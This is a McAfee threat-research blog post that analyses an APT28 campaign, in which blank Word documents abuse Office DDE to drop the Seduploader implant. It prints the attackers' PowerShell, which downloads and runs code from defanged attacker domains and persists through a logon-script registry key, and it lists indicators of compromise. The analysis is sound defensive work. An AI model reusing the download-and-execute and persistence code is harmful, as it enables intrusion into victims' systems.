{"id":82022,"date":"2017-11-07T10:00:01","date_gmt":"2017-11-07T18:00:01","guid":{"rendered":"https:\/\/securingtomorrow.mcafee.com\/?p=82022"},"modified":"2025-05-27T22:30:47","modified_gmt":"2025-05-28T05:30:47","slug":"apt28-threat-group-adopts-dde-technique-nyc-attack-theme-in-latest-campaign","status":"publish","type":"post","link":"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/apt28-threat-group-adopts-dde-technique-nyc-attack-theme-in-latest-campaign\/","title":{"rendered":"Threat Group APT28 Slips Office Malware into Doc Citing NYC Terror Attack"},"content":{"rendered":"<p><em>This blog post was co-written by Michael Rea.<\/em><\/p>\n<p>During our monitoring of activities around the APT28 threat group, McAfee Advanced Threat Research analysts identified a malicious Word document that appears to leverage the Microsoft Office Dynamic Data Exchange (DDE) technique previously reported by Advanced Threat Research. This document likely marks the first observed use of this technique by APT28. The use of DDE with PowerShell allows an attacker to execute arbitrary code on a victim\u2019s system regardless of whether macros are enabled. (McAfee product detection is covered in the Indicators of Compromise section at the end of the document.)<\/p>\n<p>APT28, also known as Fancy Bear, has recently focused on using different themes. In this case it capitalized on the recent terrorist attack in New York City. The document itself is blank. 
Once opened, the document contacts a control server to drop the first stage of the malware, Seduploader, onto a victim\u2019s system.<\/p>\n<p>The domain involved in the distribution of Seduploader was created on October 19, 11 days prior to the creation of Seduploader.<\/p>\n<p>The document we examined for this post:<\/p>\n<ul>\n<li>Filename: IsisAttackInNewYork.docx<\/li>\n<li>Sha1: 1c6c700ceebfbe799e115582665105caa03c5c9e<\/li>\n<li>Creation date: 2017-10-27T22:23:00Z<\/li>\n<\/ul>\n<p>The document uses the recently detailed DDE technique found in Office products to invoke the command prompt, which in turn launches PowerShell to run two commands. The first:<\/p>\n<p style=\"padding-left: 30px;\">C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('hxxp:\/\/netmediaresources[.]com\/config.txt');powershell -enc $e #.EXE<\/p>\n<p>The second PowerShell command is Base64 encoded and is found in the version of config.txt received from the remote server. 
It decodes as follows:<\/p>\n<p style=\"padding-left: 30px;\">$W=New-Object System.Net.WebClient;<br \/>\n$p=($Env:ALLUSERSPROFILE+\"\\vms.dll\");<br \/>\n[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};<br \/>\n$W.DownloadFile(\"hxxp:\/\/netmediaresources[.]com\/media\/resource\/vms.dll \",$p);<br \/>\nif (Test-Path $p){<br \/>\n$rd_p=$Env:SYSTEMROOT+\"\\System32\\rundll32.exe\";<br \/>\n$p_a=$p+\",#1\";<br \/>\n$pr=Start-Process $rd_p -ArgumentList $p_a;<br \/>\n$p_bat=($Env:ALLUSERSPROFILE+\"\\vms.bat\");<br \/>\n$text='set inst_pck = \"%ALLUSERSPROFILE%\\vms.dll\"'+\"`r`n\"+'if NOT exist %inst_pck % (exit)'+\"`r`n\"+'start rundll32.exe %inst_pck %,#1'<br \/>\n[io.File]::WriteAllText($p_bat,$text)<br \/>\nNew-Item -Path 'HKCU:\\Environment' -Force | Out-Null;<br \/>\nNew-ItemProperty -Path 'HKCU:\\Environment' -Name 'UserInitMprLogonScript' -Value \"$p_bat\" -PropertyType String -Force | Out-Null;<br \/>\n}<\/p>\n<p>The PowerShell scripts contact the following URL to download Seduploader:<\/p>\n<ul>\n<li>hxxp:\/\/netmediaresources[.]com\/media\/resource\/vms.dll<\/li>\n<\/ul>\n<p>The Seduploader sample has the following artifacts:<\/p>\n<ul>\n<li>Filename: vms.dll<\/li>\n<li>Sha1: 4bc722a9b0492a50bd86a1341f02c74c0d773db7<\/li>\n<li>Compile date: 2017-10-31 20:11:10<\/li>\n<li>Control server: webviewres[.]net<\/li>\n<\/ul>\n<p>The document downloads a version of the Seduploader first-stage reconnaissance implant, which profiles prospective victims, sending basic host information from the infected system to the attackers. If the system is of interest, the installation of X-Agent or Sedreco usually follows.<\/p>\n<p>Public reporting over several years documents APT28 using Seduploader as a first-stage payload. 
Based on structural code analysis of recent payloads observed in the campaign, we see they are identical to previous Seduploader samples employed by APT28.<\/p>\n<p>We identified the control server domain associated with this activity as webviewres[.]net, which is consistent with past APT28 domain registration techniques that spoof legitimate-sounding infrastructure. This domain was registered on October 25, a few days before the payload and malicious documents were created. The domain was first active on October 29, just days before this version of Seduploader was compiled. The domain currently resolves to 185.216.35.26 and is hosted on the name servers ns1.njal.la and ns2.njal.la.<\/p>\n<p>Further McAfee research identified the following related sample:<\/p>\n<ul>\n<li>Filename: secnt.dll<\/li>\n<li>Sha1: ab354807e687993fbeb1b325eb6e4ab38d428a1e<\/li>\n<li>Compile date: 2017-10-30 23:53:02<\/li>\n<li>Control server: satellitedeluxpanorama[.]com (this domain uses the same name servers as above)<\/li>\n<\/ul>\n<p>The preceding sample most likely belongs to the same campaign. Based on our analysis it uses the same techniques and payload. We can clearly establish that the campaign involving documents using DDE techniques began on October 25.<\/p>\n<p>The domain satellitedeluxpanorama[.]com, used by the implant secnt.dll, resolved to 89.34.111.160 as of November 5. The malicious document 68c2809560c7623d2307d8797691abf3eafe319a is responsible for dropping the Seduploader payload (secnt.dll). Its original file name was SaberGuardian2017.docx. This document was created on October 27. The document is distributed from hxxp:\/\/sendmevideo[.]org\/SaberGuardian2017.docx. 
The document calls sendmevideo[.]org\/dh2025e\/eh.dll to download Seduploader (ab354807e687993fbeb1b325eb6e4ab38d428a1e).<\/p>\n<p>The PowerShell command embedded in this document:<\/p>\n<p style=\"padding-left: 30px;\">$W=New-Object System.Net.WebClient;<br \/>\n$p=($Env:ALLUSERSPROFILE+\"\\mvdrt.dll\");<br \/>\n[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};<br \/>\n$W.DownloadFile(\"hxxp:\/\/sendmevideo[.]org\/dh2025e\/eh.dll\",$p);<br \/>\nif (Test-Path $p){<br \/>\n$rd_p=$Env:SYSTEMROOT+\"\\System32\\rundll32.exe\";<br \/>\n$p_a=$p+\",#1\";<br \/>\n$pr=Start-Process $rd_p -ArgumentList $p_a;<br \/>\n$p_bat=($Env:ALLUSERSPROFILE+\"\\mvdrt.bat\");<br \/>\n$text='set inst_pck = \"%ALLUSERSPROFILE%\\mvdrt.dll\"'+\"`r`n\"+'if NOT exist %inst_pck % (exit)'+\"`r`n\"+'start rundll32.exe %inst_pck %,#1'<br \/>\n[io.File]::WriteAllText($p_bat,$text)<br \/>\nNew-Item -Path 'HKCU:\\Environment' -Force | Out-Null;<br \/>\nNew-ItemProperty -Path 'HKCU:\\Environment' -Name 'UserInitMprLogonScript' -Value \"$p_bat\" -PropertyType String -Force | Out-Null;<br \/>\n}<\/p>\n<p>The file vms.dll, 4bc722a9b0492a50bd86a1341f02c74c0d773db7, is 99% similar to secnt.dll, ab354807e687993fbeb1b325eb6e4ab38d428a1e, indicating the code is almost identical and highly likely to be part of the same campaign. 
Furthermore, the sample 4bc722a9b0492a50bd86a1341f02c74c0d773db7, based on our code analysis, is 99% similar to the DLL implant 8a68f26d01372114f660e32ac4c9117e5d0577f1, which was used in a campaign spoofing the upcoming cyber conference <a href=\"http:\/\/aci.cvent.com\/events\/2017-international-conference-on-cyber-conflict-cycon-u-s-\/event-summary-004d598d31684f21ac82050a9000369f.aspx\">Cy Con U.S.<\/a><\/p>\n<p>The attack techniques in the two campaigns differ: the campaign spoofing the Cy Con U.S. conference used document files to execute a malicious VBA script, whereas this campaign, using the terrorist theme, uses DDE within a document file to execute PowerShell and fetch a remote payload from a distribution site. The payloads, however, are identical for both campaigns.<\/p>\n<h2><strong>Conclusion<\/strong><\/h2>\n<p>APT28 is a resourceful threat actor that not only capitalizes on recent events to trick potential victims into infections, but can also rapidly incorporate new exploitation techniques to increase its success. Given the publicity the Cy Con U.S. campaign received in the press, it is possible APT28 actors moved away from the VBA script employed in past actions and chose to incorporate the DDE technique to bypass network defenses. 
Finally, the use of recent domestic events and a prominent US military exercise focused on deterring Russian aggression highlights APT28\u2019s ability and interest in exploiting geopolitical events for its operations.<\/p>\n<h2><strong>Indicators of Compromise<\/strong><\/h2>\n<p><em>SHA1 Hashes<\/em><\/p>\n<ul>\n<li>4bc722a9b0492a50bd86a1341f02c74c0d773db7 (vms.dll, Seduploader implant)<\/li>\n<li>ab354807e687993fbeb1b325eb6e4ab38d428a1e (secnt.dll, Seduploader implant)<\/li>\n<li>1c6c700ceebfbe799e115582665105caa03c5c9e (IsisAttackInNewYork.docx)<\/li>\n<li>68c2809560c7623d2307d8797691abf3eafe319a (SaberGuardian2017.docx)<\/li>\n<\/ul>\n<p><em>Domains<\/em><\/p>\n<ul>\n<li>webviewres[.]net<\/li>\n<li>netmediaresources[.]com<\/li>\n<\/ul>\n<p><em>IPs<\/em><\/p>\n<ul>\n<li>185.216.35.26<\/li>\n<li>89.34.111.160<\/li>\n<\/ul>\n<p><em>McAfee coverage<\/em><\/p>\n<ul>\n<li>McAfee products detect this threat as RDN\/Generic Downloader.x.<\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>This blog post was co-written by Michael Rea. 
During our monitoring of activities around the APT28 threat group, McAfee Advanced&#8230;<\/p>\n","protected":false},"author":911,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[442],"tags":[1814,4452,338],"coauthors":[2544],"class_list":["post-82022","post","type-post","status-publish","format-standard","hentry","category-mcafee-labs","tag-computer-security","tag-cybersecurity","tag-endpoint-protection"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v25.4 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Threat Group APT28 Slips Office Malware into Doc Citing NYC Terror Attack<\/title>\n<meta name=\"description\" content=\"While monitoring activities around APT28, we identified a malicious Word document that leverages the Microsoft Office DDE technique.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Threat Group APT28 Slips Office Malware into Doc Citing NYC Terror Attack\" \/>\n<meta property=\"og:description\" content=\"While monitoring activities around APT28, we identified a malicious Word document that leverages the Microsoft Office DDE technique.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/apt28-threat-group-adopts-dde-technique-nyc-attack-theme-in-latest-campaign\/\" \/>\n<meta property=\"og:site_name\" content=\"McAfee Blog\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/McAfee\/\" \/>\n<meta property=\"article:published_time\" content=\"2017-11-07T18:00:01+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-05-28T05:30:47+00:00\" \/>\n<meta name=\"author\" 
content=\"Ryan Sherstobitoff\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@r_sherstobitoff\" \/>\n<meta name=\"twitter:site\" content=\"@McAfee\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Ryan Sherstobitoff\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/apt28-threat-group-adopts-dde-technique-nyc-attack-theme-in-latest-campaign\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/apt28-threat-group-adopts-dde-technique-nyc-attack-theme-in-latest-campaign\/\"},\"author\":{\"name\":\"Ryan Sherstobitoff\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/8f80835dde8294e9c91e4cd0f998e035\"},\"headline\":\"Threat Group APT28 Slips Office Malware into Doc Citing NYC Terror Attack\",\"datePublished\":\"2017-11-07T18:00:01+00:00\",\"dateModified\":\"2025-05-28T05:30:47+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/apt28-threat-group-adopts-dde-technique-nyc-attack-theme-in-latest-campaign\/\"},\"wordCount\":1197,\"publisher\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\"},\"keywords\":[\"computer security\",\"cybersecurity\",\"endpoint protection\"],\"articleSection\":[\"McAfee 
Labs\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/apt28-threat-group-adopts-dde-technique-nyc-attack-theme-in-latest-campaign\/\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/apt28-threat-group-adopts-dde-technique-nyc-attack-theme-in-latest-campaign\/\",\"name\":\"Threat Group APT28 Slips Office Malware into Doc Citing NYC Terror Attack\",\"isPartOf\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#website\"},\"datePublished\":\"2017-11-07T18:00:01+00:00\",\"dateModified\":\"2025-05-28T05:30:47+00:00\",\"description\":\"While monitoring activities around APT28, we identified a malicious Word document that leverages the Microsoft Office DDE technique.\",\"breadcrumb\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/apt28-threat-group-adopts-dde-technique-nyc-attack-theme-in-latest-campaign\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/apt28-threat-group-adopts-dde-technique-nyc-attack-theme-in-latest-campaign\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/apt28-threat-group-adopts-dde-technique-nyc-attack-theme-in-latest-campaign\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Blog\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Other Blogs\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"McAfee Labs\",\"item\":\"https:\/\/www.mcafee.com\/blogs\/other-blogs\/mcafee-labs\/\"},{\"@type\":\"ListItem\",\"position\":4,\"name\":\"Threat Group APT28 Slips Office Malware into Doc Citing NYC Terror 
Attack\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#website\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/\",\"name\":\"McAfee Blog\",\"description\":\"Internet Security News\",\"publisher\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.mcafee.com\/blogs\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#organization\",\"name\":\"McAfee\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2023\/02\/mcafee-logo.png\",\"width\":1286,\"height\":336,\"caption\":\"McAfee\"},\"image\":{\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/McAfee\/\",\"https:\/\/x.com\/McAfee\",\"https:\/\/www.linkedin.com\/company\/mcafee\/\",\"https:\/\/www.youtube.com\/McAfee\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/8f80835dde8294e9c91e4cd0f998e035\",\"name\":\"Ryan Sherstobitoff\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.mcafee.com\/blogs\/#\/schema\/person\/image\/b9bc99b6021883cbf5794b450795dc55\",\"url\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/07\/Ryan-150x150.jpg\",\"contentUrl\":\"https:\/\/www.mcafee.com\/blogs\/wp-content\/uploads\/2018\/07\/Ryan-150x150.jpg\",\"caption\":\"Ryan Sherstobitoff\"},\"description\":\"Ryan Sherstobitoff is a Senior Analyst for Major Campaigns 
\u2013 Advanced Threat Research in McAfee. Ryan specializes in threat intelligence in the Asia Pacific Region where he conducts cutting edge research into new adversarial techniques and adapts those to better monitor the threat landscape. He formerly was the Chief Corporate Evangelist at Panda Security, where he managed the US strategic response for new and emerging threats. Ryan is widely recognized as a security &amp; cloud computing expert throughout the country.\",\"sameAs\":[\"https:\/\/www.linkedin.com\/in\/ryan-sherstobitoff-a1334a5\/\",\"https:\/\/x.com\/r_sherstobitoff\"],\"url\":\"https:\/\/www.mcafee.com\/blogs\/author\/ryan-sherstobitoff\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->"}